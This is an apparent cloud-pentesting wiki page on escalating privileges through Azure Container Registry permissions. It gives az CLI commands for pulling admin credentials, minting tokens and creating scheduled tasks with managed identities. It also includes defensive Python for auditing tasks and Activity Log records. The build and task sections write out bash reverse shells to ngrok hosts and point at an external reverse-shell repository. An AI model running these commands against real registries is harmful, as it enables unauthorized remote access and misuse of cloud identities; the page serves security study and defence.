Az - Azure Container Registry Privesc


Azure Container Registry

For more information check:

Az - Container Registry

Microsoft.ContainerRegistry/registries/listCredentials/action

This permission allows a user to list the admin credentials of the ACR. This is useful because those credentials grant full access over the registry.

```bash
az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerRegistry/registries/<registry-name>/listCredentials?api-version=2023-11-01-preview"
```

If the admin user is not enabled, you will also need the permission Microsoft.ContainerRegistry/registries/write to enable it with:

```bash
az rest --method PATCH --uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerRegistry/registries/<registry-name>?api-version=2023-11-01-preview" --body '{"properties": {"adminUserEnabled": true}}'
```

Microsoft.ContainerRegistry/registries/tokens/write, Microsoft.ContainerRegistry/registries/generateCredentials/action

These permissions allow a user to create a new token with passwords to access the registry.

To create it with the az cli as in the following example, you will also need the permissions Microsoft.ContainerRegistry/registries/read, Microsoft.ContainerRegistry/registries/scopeMaps/read, Microsoft.ContainerRegistry/registries/tokens/operationStatuses/read and Microsoft.ContainerRegistry/registries/tokens/read.

```bash
az acr token create \
--registry <registry-name> \
--name <token-name> \
--scope-map _repositories_admin
```

Microsoft.ContainerRegistry/registries/listBuildSourceUploadUrl/action, Microsoft.ContainerRegistry/registries/scheduleRun/action, Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action

These permissions allow a user to build and run images in the registry. This could be used to execute code inside a container.

[!WARNING] However, the image will be executed in a sandboxed environment without access to the metadata service. This means the container won't be able to obtain the instance metadata, so this isn't very useful for privilege escalation.

```bash
# Build (echo -e so the \n sequences become Dockerfile line breaks)
echo -e 'FROM ubuntu:latest\nRUN bash -c "bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/17585 0>&1"\nCMD ["/bin/bash", "-c", "bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/17585 0>&1"]' > Dockerfile
az acr run --registry 12345TestingRegistry --cmd '$Registry/rev/shell:v1:v1' /dev/null
```

Microsoft.ContainerRegistry/registries/tasks/write

This is the main permission, as it allows creating and updating tasks in the registry. This could be used to execute code inside a container with an identity attached to it.

This is an example of how to execute a reverse shell inside a container with the system managed identity attached to it:

```bash
az acr task create \
--registry <registry-name> \
--name reverse-shell-task \
--image rev/shell:v1 \
--file ./Dockerfile \
--context https://github.com/carlospolop/Docker-rev.git \
--assign-identity \
--commit-trigger-enabled false \
--schedule "*/1 * * * *"
```

Another way to get RCE from a task without using an external repository is to use the az acr task create command with the --cmd flag. This lets you run a command inside the container. For example, you can run a reverse shell with the following command:

```bash
az acr task create \
--registry <registry-name> \
--name reverse-shell-task-cmd \
--image rev/shell2:v1 \
--cmd 'bash -c "bash -i >& /dev/tcp/4.tcp.eu.ngrok.io/15508 0>&1"' \
--schedule "*/1 * * * *" \
--context /dev/null \
--commit-trigger-enabled false \
--assign-identity
```

tip

Note that no special permission is needed to attach the system managed identity, although it must have been enabled beforehand in the registry and granted some permissions for it to be useful.

To attach a user managed identity you also need the permission Microsoft.ManagedIdentity/userAssignedIdentities/assign/action to run:

```bash
az acr task create \
--registry <registry-name> \
--name reverse-shell-task \
--image rev/shell:v1 \
--file ./Dockerfile \
--context https://github.com/carlospolop/Docker-rev.git \
--assign-identity [system] "/subscriptions/<subscription-id>/resourcegroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<mi-name>" \
--commit-trigger-enabled false \
--schedule "*/1 * * * *"
```

To update the repository of an existing task you can run:

```bash
az acr task update \
--registry <registry-name> \
--name reverse-shell-task \
--context https://github.com/your-user/your-repo.git
```
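From the defender's side, the task shapes described above (an identity attached to a task that runs on a timer, builds from an externally hosted repository, or carries an inline --cmd step) can be audited from the task list. The following Python is an added example, not part of the original page or the az CLI; it assumes the field names `identity.type`, `step.type`, `step.contextPath` and `trigger.timerTriggers` as returned by `az acr task list -o json`, a hypothetical allow-list of trusted repository prefixes, and constructed sample tasks.

```python
# Added example: audit ACR tasks for identity + scheduled/external/inline code execution.
# Field names are assumed from `az acr task list -o json`; verify against your own output.
TRUSTED_CONTEXT_PREFIXES = ("https://github.com/example-org/",)  # hypothetical allow-list

def audit_task(task, trusted=TRUSTED_CONTEXT_PREFIXES):
    """Return a list of human-readable findings for one task record."""
    findings = []
    identity = (task.get("identity") or {}).get("type", "None")
    if identity == "None":
        return findings  # without an identity the task cannot act on other Azure resources
    step = task.get("step") or {}
    context = step.get("contextPath") or ""
    timers = [t for t in (task.get("trigger") or {}).get("timerTriggers") or []
              if t.get("status") == "Enabled"]
    if timers:
        schedules = [t.get("schedule") for t in timers]
        findings.append(f"identity {identity} runs on schedule(s) {schedules}")
    if context.startswith(("http://", "https://")) and not context.startswith(trusted):
        findings.append(f"build context outside allow-list: {context}")
    if step.get("type") == "EncodedTask":  # what `--cmd` produces (assumption)
        findings.append("inline (encoded) step: review the embedded command")
    return findings

def audit_tasks(tasks):
    """Map task name -> findings, keeping only tasks with at least one finding."""
    return {t["name"]: f for t in tasks if (f := audit_task(t))}

SAMPLE_TASKS = [  # constructed sample data, not a real registry
    {"name": "nightly-build", "identity": {"type": "None"},
     "step": {"type": "Docker", "contextPath": "https://github.com/example-org/app.git"},
     "trigger": {"timerTriggers": [{"name": "t1", "schedule": "0 2 * * *", "status": "Enabled"}]}},
    {"name": "reverse-shell-task", "identity": {"type": "SystemAssigned"},
     "step": {"type": "Docker", "contextPath": "https://github.com/carlospolop/Docker-rev.git"},
     "trigger": {"timerTriggers": [{"name": "t1", "schedule": "*/1 * * * *", "status": "Enabled"}]}},
    {"name": "reverse-shell-task-cmd", "identity": {"type": "SystemAssigned"},
     "step": {"type": "EncodedTask", "contextPath": "/dev/null"},
     "trigger": {"timerTriggers": [{"name": "t1", "schedule": "*/1 * * * *", "status": "Enabled"}]}},
]

if __name__ == "__main__":
    for name, findings in audit_tasks(SAMPLE_TASKS).items():
        print(name)
        for finding in findings:
            print("  -", finding)
```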

Microsoft.ContainerRegistry/registries/importImage/action

With this permission it's possible to import images into the Azure registry, even without having the image locally. However, note that you cannot import an image with a tag that already exists in the registry.

```bash
# Push with az cli
az acr import \
--name <registry-name> \
--source mcr.microsoft.com/acr/connected-registry:0.8.0 # Example of a repo to import
```

To untag or delete a specific image tag from the registry you can use the following commands. However, note that you will need a user or token with enough permissions to do so:

```bash
az acr repository untag \
--name <registry-name> \
--image <image-name>:<tag>

az acr repository delete \
--name <registry-name> \
--image <image-name>:<tag>
```
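Every operation on this page is a control-plane call that lands in the Azure Activity Log, so the permission names above double as detection keys. The following Python is an added example (not from the original page) that triages exported Activity Log records for those operations and singles out the registries/write call that flips adminUserEnabled; the record field names (`operationName.value`, `caller`, `resourceId`, `properties.requestbody`) are assumed from the Activity Log export format and the sample records are constructed.

```python
import json

# Added example: triage Activity Log records for the ACR operations listed on this page.
# Record field names are assumed from the Activity Log export format; verify against yours.
REVIEW_OPS = {  # operation names exactly as they appear as RBAC actions above
    "Microsoft.ContainerRegistry/registries/listCredentials/action": "admin credentials retrieved",
    "Microsoft.ContainerRegistry/registries/generateCredentials/action": "token password generated",
    "Microsoft.ContainerRegistry/registries/tokens/write": "registry token created or updated",
    "Microsoft.ContainerRegistry/registries/tasks/write": "task created or updated (runs code, may carry an identity)",
    "Microsoft.ContainerRegistry/registries/scheduleRun/action": "ad-hoc build/run scheduled",
    "Microsoft.ContainerRegistry/registries/importImage/action": "image imported from an external source",
}
ADMIN_TOGGLE_OP = "Microsoft.ContainerRegistry/registries/write"

def admin_user_enabled(record):
    """True if a registries/write request body turns the admin user on (the write itself is routine)."""
    body = (record.get("properties") or {}).get("requestbody") or "{}"
    try:
        return json.loads(body).get("properties", {}).get("adminUserEnabled") is True
    except (ValueError, AttributeError):
        return False

def classify(record):
    """Return a finding dict for a record worth reviewing, else None."""
    op = (record.get("operationName") or {}).get("value", "")
    reason = REVIEW_OPS.get(op)
    if op == ADMIN_TOGGLE_OP and admin_user_enabled(record):
        reason = "adminUserEnabled switched on"
    if reason is None:
        return None
    return {"caller": record.get("caller"), "operation": op, "reason": reason,
            "resource": record.get("resourceId")}

def triage(records):
    """Keep only the records that classify() flags, in log order."""
    return [f for f in map(classify, records) if f is not None]

REGISTRY = "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerRegistry/registries/<registry-name>"
SAMPLE_RECORDS = [  # constructed sample records, not real telemetry
    {"operationName": {"value": ADMIN_TOGGLE_OP}, "caller": "dev@example.test", "resourceId": REGISTRY,
     "properties": {"requestbody": json.dumps({"properties": {"adminUserEnabled": True}})}},
    {"operationName": {"value": "Microsoft.ContainerRegistry/registries/listCredentials/action"},
     "caller": "dev@example.test", "resourceId": REGISTRY, "properties": {}},
    {"operationName": {"value": "Microsoft.ContainerRegistry/registries/read"},
     "caller": "ci@example.test", "resourceId": REGISTRY, "properties": {}},  # benign, not flagged
]
```

A registries/write that does not touch adminUserEnabled is deliberately left unflagged, since routine registry updates use the same operation name.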
